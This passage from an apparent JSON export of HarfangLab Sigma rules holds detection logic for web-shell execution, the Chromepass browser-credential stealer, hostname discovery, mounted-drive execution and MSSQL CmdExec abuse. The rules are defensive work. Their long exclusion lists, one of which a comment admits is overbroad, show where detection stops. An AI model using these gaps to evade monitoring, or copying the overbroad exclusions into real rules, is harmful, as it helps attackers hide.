/defunct/ {print $1}' 2>/dev/null\"\n - 'sh -c ps x 2>/dev/null > /dev/null 2>&1; echo $\\?'\n - 'sh -c uname -a 2> /dev/null'\n - 'sh -c id'\n - 'sh -c df -T -t nfs \"*matomo*/tmp/sessions\" 2>&1'\n - 'sh -c /bin/df -kP'\n - 'sh -c /usr/bin/php -q */matomo/console *' # and also with one\n - \"sh -c which 'awk' 2> /dev/null\"\n - 'sh -c ps > /dev/null 2>&1; echo $\\?'\n - \"sh -c which 'ps' 2> /dev/null\"\n\n exclusion_matomo_2:\n CommandLine|contains|all:\n - 'sh -c /usr/bin/php -q /var/www'\n - 'matomo'\n\n exclusion_nextcloud:\n CommandLine:\n - 'sh -c flatpak list --app'\n - 'sh -c kitinerary-extractor'\n - 'sh -c */custom_apps/mail/vendor/christophwurst/kitinerary-bin/src/../bin/kitinerary-extractor'\n\n exclusion_openssl:\n CommandLine:\n - '/bin/sh -c openssl genrsa 1024'\n - '/bin/sh -c openssl x509 -req -sha1 -CA /etc/pki/pulp/ca.crt -CAkey /etc/pki/pulp/ca.key -set_serial *'\n - 'sh -c /usr/bin/openssl ts -reply *'\n - 'sh -c /usr/bin/openssl ts -query *'\n - 'sh -c /usr/bin/openssl version'\n\n exclusion_glpi_plugins:\n CurrentDirectory: '*glpi*'\n CommandLine:\n - 'sh -c /bin/df -hm |grep sd | awk *'\n - 'sh -c /bin/df -h |grep sd | awk *'\n - 'sh -c /usr/bin/free -tm | /usr/bin/awk *'\n - 'sh -c uptime |cut -d\" \" -f4-8'\n - 'sh -c /usr/bin/lsb_release -ds'\n - 'sh -c cat /etc/os-release'\n\n exclusion_librenms:\n CurrentDirectory: '*librenms*' # /opt/librenms/rrd/\n CommandLine: \"sh -c exec '/usr/bin/rrdtool' '-'\"\n\n exclusion_inkscape:\n CommandLine: 'sh -c ?inkscape? ?/tmp/magick-* --export-*=?/tmp/magick-* --export-dpi=* --export-background=?rgb(*)? 
--export-background-opacity=* > ?/tmp/magick-* 2>&1'\n\n exclusion_exclusion_zf2:\n CommandLine|startswith: 'sh -c php /usr/bin/zf2_cli'\n ParentImage: '/usr/sbin/apache2'\n\n exclusion_zoneminder:\n CommandLine: 'sh -c /usr/bin/zmdc.pl *'\n\n exclusion_unoconv:\n CommandLine|startswith:\n - 'sh -c timeout -k * sudo /usr/local/bin/unoconv.sh /mnt/'\n - 'sh -c exec ?/usr/local/bin/unoconv'\n\n exclusion_pmsi_pilot:\n CommandLine|startswith: 'sh -c test -d ?/var/pmsipilot/datafiles/pmsipilot/'\n\n exclusion_games_dealer:\n CommandLine|startswith: 'sh -c /usr/games/dealer < /tmp/'\n\n exclusion_png2jpg:\n CommandLine|startswith: 'sh -c sudo /usr/local/bin/pdf2jpgConversion2.sh'\n\n exclusion_bridgemaster:\n CommandLine|startswith: 'sh -c ./bridgemaster'\n\n exclusion_java:\n CommandLine|startswith: 'sh -c export LANG=C.UTF-8; java -Djava.awt.headless=true -Dfile.encoding=UTF8 -cp'\n\n exclusion_codeversionmanager:\n CommandLine|startswith:\n - 'sh -c git '\n - 'sh -c svn '\n - 'sh -c cd svn '\n\n exclusion_convertors:\n CommandLine|startswith:\n - 'sh -c gs -sDEVICE=pdfwrite* -dPDFSETTINGS=/default -dNOPAUSE -dQUIET -dBATCH'\n - 'sh -c pdfdeconstruct'\n - 'sh -c convert '\n - 'sh -c /usr/bin/convert '\n - 'sh -c cat ?/tmp/seda2pdf'\n - 'sh -c catdoc -V'\n - 'sh -c exiftool -ver'\n - 'sh -c ffmpeg -version'\n - 'sh -c identify '\n - 'sh -c /usr/bin/identify '\n - 'sh -c ?identify '\n - 'sh -c ?/usr/bin/identify '\n - 'sh -c /usr/bin/cwebp'\n\n exclusion_ccrypt:\n CommandLine|startswith: 'sh -c ccrypt -e /var/www/'\n\n exclusion_nice:\n CommandLine|startswith: 'sh -c nohup nice -n 10'\n\n exclusion_fido:\n CommandLine|startswith: 'sh -c python -m fido.fido -matchprintf'\n\n exclusion_wkhtmltopdf:\n CommandLine|contains: '/bin/wkhtmltopdf'\n\n exclusion_ophtixng:\n CommandLine|startswith: 'sh -c php /var/www/OphtixNG'\n\n exclusion_pastell:\n CommandLine|startswith: 'sh -c *?/var/www/pastell-*/web/api? 
; /usr/bin/openssl'\n\n exclusion_squidguard:\n CommandLine|startswith: 'sh -c cd /var/lib/squidguard'\n\n exclusion_kalilab:\n - CommandLine|contains: '/var/www/kalilab/'\n - CurrentDirectory|startswith: '/var/www/kalilab/'\n\n exclusion_sandbox:\n CommandLine|startswith: 'sh -c ?grep? ?BEGIN CERTIFICATE?'\n\n exclusion_unknown_1:\n CommandLine:\n - 'sh -c grep ENCRYPTED \\* -l'\n - 'sh -c stty -a | grep columns'\n\n exclusion_asalae:\n CommandLine|startswith: 'sh -c timeout 10.0 journalctl -u ?asalae-worker-manager.service?'\n\n exclusion_geopsy:\n CommandLine|contains:\n - 'sh -c ?? -v /geopsy/www/geopsy/htdocs/download/releases/geopsypack-'\n - '/geopsy/www/geopsy/htdocs'\n\n exclusion_redpilot:\n CurrentDirectory|contains: 'redpilot'\n CommandLine|contains: 'sh -c libellename'\n\n exclusion_pdftk:\n CommandLine|contains: \"sh -c timeout 30 /usr/bin/pdftk '/u/apps/ikzend2\"\n\n exclusion_httpd_foreground:\n CommandLine|startswith: 'sh -c tput cols'\n ParentCommandLine: '/usr/sbin/httpd -dforeground'\n\n exclusion_bacula:\n CommandLine|startswith: 'sh -c sudo /opt/bacula/bin/bconsole -c '\n\n exclusion_squidgard:\n CommandLine|contains:\n - '/usr/bin/squidguard '\n - '/var/log/squidguard/'\n - '/var/lib/squidguard/'\n\n exclusion_webkiosk_plugin:\n CurrentDirectory: '/var/www/webkiosk-*/'\n CommandLine: 'sh -c *'\n\n exclusion_moodle:\n CommandLine:\n - '*/moodledata/*'\n - 'sh -c ?/usr/bin/gs? -q -sDEVICE=*'\n - 'sh -c ?/usr/bin/convert? *'\n - 'sh -c ?/usr/bin/dvips? *'\n - 'sh -c ?/usr/bin/latex? *'\n - 'sh -c ?latex? 
*'\n\n exclusion_plz_sandbox:\n CommandLine: 'sh -c */tmp/plz_sandbox/*'\n\n # https://memcourrier.edissyum.com/\n exclusion_memcourrier:\n CurrentDirectory: '/var/www/mem_courrier/'\n CommandLine:\n - 'sh -c HOME=/tmp convert -thumbnail * -background white -alpha remove *'\n - 'sh -c php src/app/convert/scripts/FullTextScript.php --customId * --resId * --collId * --userId * > /dev/null &'\n - 'sh -c nc -vz -w 5 * 2>&1'\n - 'sh -c whereis xvfb-run'\n - 'sh -c xvfb-run -a -e /dev/stderr wkhtmltopdf -B 10mm -L 10mm -R 10mm -T 10mm --load-error-handling ignore --load-media-error-handling ignore --encoding utf-8 *'\n - 'sh -c php src/app/email/scripts/sendEmail.php *'\n - 'sh -c crontab -l'\n - 'sh -c pdfunite ?/var/docservers/mem/convert_mlb/*.pdf? *'\n - 'sh -c crontab /tmp/crontab.txt'\n\n exclusion_libreoffice:\n CommandLine|contains|all:\n - ' /usr/bin/libreoffice '\n - ' --headless '\n\n condition: 1 of selection_parent_* and selection_shell_execution and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb325077-7493-4f82-9b3f-208764d322eb",
"rule_name": "Possible Web Shell Execution",
"rule_description": "Detects the execution of a suspicious shell process by a common web server software likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.\nAdversaries may also backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to analyze the command-line as well as to correlate this alert with other commands executed around it from the web server to determine their legitimacy.\n",
"rule_creation_date": "2021-09-17",
"rule_modified_date": "2026-01-28",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb41fe42-89d5-48a3-a7ee-8e098678f7ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296063Z",
"creation_date": "2026-03-23T11:45:35.296066Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296073Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/darkarp/chromepass",
"https://attack.mitre.org/techniques/T1005/"
],
"name": "t1005_chromepass.yml",
"content": "title: Chromepass Hacktool\nid: cb41fe42-89d5-48a3-a7ee-8e098678f7ff\ndescription: |\n Detects a Chromepass generated binary being executed.\n Chromepass is a python-based framework that generates Rust binaries that extract and exfiltrate information from Chrome-based browsers.\n It is recommended to investigate the process performing this action to determine its legitimacy.\n If you assume this to be a breach, it is recommended to rotate the credentials used by the affected user.\nreferences:\n - https://github.com/darkarp/chromepass\n - https://attack.mitre.org/techniques/T1005/\ndate: 2026/01/27\nmodified: 2026/02/17\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - attack.t1185\n - attack.discovery\n - attack.t1217\n - attack.privilege_escalation\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Chromepass\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Product: 'chromepass'\n - Description: 'chromepass'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb41fe42-89d5-48a3-a7ee-8e098678f7ff",
"rule_name": "Chromepass Hacktool",
"rule_description": "Detects a Chromepass generated binary being executed.\nChromepass is a python-based framework that generates Rust binaries that extract and exfiltrate information from Chrome-based browsers.\nIt is recommended to investigate the process performing this action to determine its legitimacy.\nIf you assume this to be a breach, it is recommended to rotate the credentials used by the affected user.\n",
"rule_creation_date": "2026-01-27",
"rule_modified_date": "2026-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1005",
"attack.t1185",
"attack.t1217",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb4bfe98-8568-4057-97e4-e71a345c4957",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622760Z",
"creation_date": "2026-03-23T11:45:34.622762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622766Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1082/"
],
"name": "t1082_hostname_windows.yml",
"content": "title: Hostname Execution\nid: cb4bfe98-8568-4057-97e4-e71a345c4957\ndescription: |\n Detects the execution of hostname.exe, which may be exploited by attackers to gather information about a system during the early stages of an attack.\n It is recommended to investigate the process execution context and correlate with other alerts to determine if the use of hostname.exe is legitimate or part of a broader malicious activity, such as information gathering or lateral movement.\nreferences:\n - https://attack.mitre.org/techniques/T1082/\ndate: 2022/12/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'hostname.exe'\n\n selection_hostname_1:\n ParentCommandLine:\n - 'cmd.exe /c hostname'\n - 'cmd.exe /c hostname.exe'\n GrandparentImage|endswith:\n - '\\powershell.exe'\n - '\\wsmprovhost.exe'\n\n selection_hostname_2:\n CommandLine:\n - 'hostname'\n - 'hostname.exe'\n IntegrityLevel: 'System'\n\n selection_injection:\n ParentImage|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n filter_injection:\n - ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\SysWOW64\\cmd.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\SysWOW64\\sihost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n - ParentCommandLine:\n - '?:\\WINDOWS\\system32\\wsmprovhost.exe -Embedding'\n - '?:\\WINDOWS\\SysWOW64\\wsmprovhost.exe -Embedding'\n - 
'?:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding'\n - '?:\\Windows\\SysWOW64\\wbem\\wmiprvse.exe -secured -Embedding'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\IBM\\InformationServer\\Server\\DSEngine\\bin\\uvsh.exe'\n - '?:\\Program Files (x86)\\BigFix Enterprise\\BES Client\\BESClient.exe'\n - '\\IBM\\IEM\\BESClient.exe|?:\\Windows\\System32\\services.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n - '?:\\Windows\\ADDMRemQuery_x86_64_v2.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n - '\\bin\\zabbix_agentd.exe|?:\\Windows\\System32\\services.exe'\n - '\\PhenixServer\\GED\\TomcatGED\\bin\\tomcat?.exe'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe'\n - '\\asys\\progress\\openedge\\bin\\_progres.exe'\n - '\\Digitech\\WebDelib\\Apache-Tomcat\\bin\\WebDelibTomcat.exe'\n - '\\hardis\\reflex\\product\\windows\\ADELIWS_WINDOWS\\win64\\JavaService.exe'\n - '?:\\Windows\\Prey\\wpxsvc.exe'\n\n exclusion_commandline:\n ParentCommandLine|contains: 'cmd /V:ON /E:ON /D /C (hostname) 1>C:\\Windows\\TEMP\\sf_proc_00.out 2>C:\\Windows\\TEMP\\sf_proc_00.err'\n\n exclusion_carestream:\n - CurrentDirectory:\n - '?:\\Program Files\\Carestream\\Smart Link Agent\\Services\\bin\\'\n - 
'?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\Services\\bin\\'\n - '?:\\Program Files\\Carestream\\System5\\syscheck\\'\n - ParentCommandLine|contains:\n - 'perl *\\System5\\nagios\\scripts\\'\n - 'perl.exe *\\System5\\syscheck\\'\n - 'perl */syscheck/syscheck.pl'\n - 'perl *\\System5\\syscheck\\syscheck.pl'\n - 'perl*C:\\PROGRA~1\\CAREST~1\\System5\\'\n\n exclusion_neem:\n CurrentDirectory:\n - '?:\\Program Files\\Apache Software Foundation\\Apache*\\Neem\\Neem'\n - '?:\\Program Files (x86)\\Apache Software Foundation\\Apache*\\Neem\\Neem'\n\n exclusion_tssv2:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '\\TSSv2.ps1'\n\n exclusion_chronos:\n CurrentDirectory:\n - '*\\Asys\\Chronos\\Client\\'\n - '?:\\Asys\\Environnements\\\\*'\n\n exclusion_rider:\n ParentImage|endswith: '\\JetBrains\\Toolbox\\apps\\Rider\\\\*\\bin\\rider64.exe'\n\n exclusion_system_center:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine: '?:\\Program Files\\Microsoft System Center ????\\DPM\\DPM\\bin\\msdpm.exe'\n\n exclusion_evtexport:\n ParentCommandLine|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $hostname=hostname;Get-winEvent -filterHashTable'\n\n exclusion_dbspicam:\n GrandparentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c dbspicam *'\n\n exclusion_hp:\n Ancestors|contains: '?:\\Program Files\\HP\\HP BTO Software\\lbin\\eaagt\\opcacta.exe'\n\n exclusion_manageengine1:\n ParentCommandLine: '*;../lib/AdventNetUpdateManagerInstaller.jar;*'\n GrandparentImage: '*\\bin\\wrapper.exe'\n exclusion_manageengine2:\n Ancestors|contains: '|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcondemand.exe|?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\bin\\dcagentservice.exe|'\n\n exclusion_winrm:\n Ancestors:\n - 
'?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_ricoh:\n CurrentDirectory: '?:\\Program Files\\RICOH\\TotalFlow PM\\'\n\n exclusion_schedule:\n - GrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessParentGrandparentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - GrandparentCommandLine: '?:\\WINDOWS\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n Ancestors: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_intersystems:\n ProcessGrandparentOriginalFileName:\n - 'Cache.exe'\n - 'irisdb.exe'\n ProcessGrandparentCompany: 'InterSystems'\n\n condition: selection and ((1 of selection_hostname_*) or (selection_injection and not filter_injection)) and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb4bfe98-8568-4057-97e4-e71a345c4957",
"rule_name": "Hostname Execution",
"rule_description": "Detects the execution of hostname.exe, which may be exploited by attackers to gather information about a system during the early stages of an attack.\nIt is recommended to investigate the process execution context and correlate with other alerts to determine if the use of hostname.exe is legitimate or part of a broader malicious activity, such as information gathering or lateral movement.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1082"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb59ec57-9201-4464-a43b-fc8d339da03f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626206Z",
"creation_date": "2026-03-23T11:45:34.626208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/",
"https://attack.mitre.org/techniques/T1566/001/"
],
"name": "t1204_suspicious_extension_from_mounted_drive.yml",
"content": "title: Suspicious Process Extension from Mounted Drive\nid: cb59ec57-9201-4464-a43b-fc8d339da03f\ndescription: |\n Detects an execution from a mounted drive (ISO, IMG or USB) with a suspicious file extension.\n It is often the result of a spearphishing attack via a removable media such as a USB key or via an ISO or IMG file.\n Attackers may abuse it to gain execution and to avoid detection.\n It is recommended to check the executed binary for malicious behavior or content.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\n - https://attack.mitre.org/techniques/T1566/001/\ndate: 2025/12/10\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - attack.initial_access\n - attack.t1566.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Phishing\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ImageDriveType:\n - 'removable'\n - 'disk_image'\n\n filter_legit_extensions:\n Image|endswith:\n - '.exe'\n - '.dll'\n - '.bin'\n - '.sys'\n - '.scr'\n - '.W_X'\n - '.QZ_'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb59ec57-9201-4464-a43b-fc8d339da03f",
"rule_name": "Suspicious Process Extension from Mounted Drive",
"rule_description": "Detects an execution from a mounted drive (ISO, IMG or USB) with a suspicious file extension.\nIt is often the result of a spearphishing attack via a removable media such as a USB key or via an ISO or IMG file.\nAttackers may abuse it to gain execution and to avoid detection.\nIt is recommended to check the executed binary for malicious behavior or content.\n",
"rule_creation_date": "2025-12-10",
"rule_modified_date": "2026-01-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1204",
"attack.t1566.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb61697d-e59e-4928-b4cc-0d866202a835",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628291Z",
"creation_date": "2026-03-23T11:45:34.628292Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_cmdexec.yml",
"content": "title: Execution of a Suspicious MSSQL CmdExec Job\nid: cb61697d-e59e-4928-b4cc-0d866202a835\ndescription: |\n Detects the execution of an MSSQL job using the CmdExec subsystem.\n Attackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlagent.exe'\n Image|startswith: '?:\\' # Ignore shares\n\n # This is handled by the rule 801a7bc0-ff7d-467e-91c6-47048e296a77\n filter_cmd:\n Image: '?:\\windows\\system32\\cmd.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - '?:\\WINDOWS\\syswow64\\conhost.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Syswow64\\WerFault.exe'\n\n exclusion_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - '\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft 
Corporation'\n ProcessSigned: 'true'\n\n exclusion_powershell_script: # mainly administration scripts; only the trailing '.ps1' is checked, so any job step whose command line merely ends with a .ps1 path is excluded too - review the script path before dismissing\n Image: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n CommandLine|endswith: '.ps1'\n\n exclusion_msft_tools:\n ProcessOriginalFileName: 'TriggerJob.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_common_export_tools:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\System32\\forfiles.exe'\n - Image|endswith: '\\psftp.exe'\n Company: 'Simon Tatham'\n - Image|endswith:\n - '\\WinSCP.com'\n - '\\WinSCP.exe'\n Company: 'Martin Prikryl'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb61697d-e59e-4928-b4cc-0d866202a835",
"rule_name": "Execution of a Suspicious MSSQL CmdExec Job",
"rule_description": "Detects the execution of an MSSQL job using the CmdExec subsystem.\nAttackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb9fbc59-20a2-44fa-a29f-2478fa492249",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
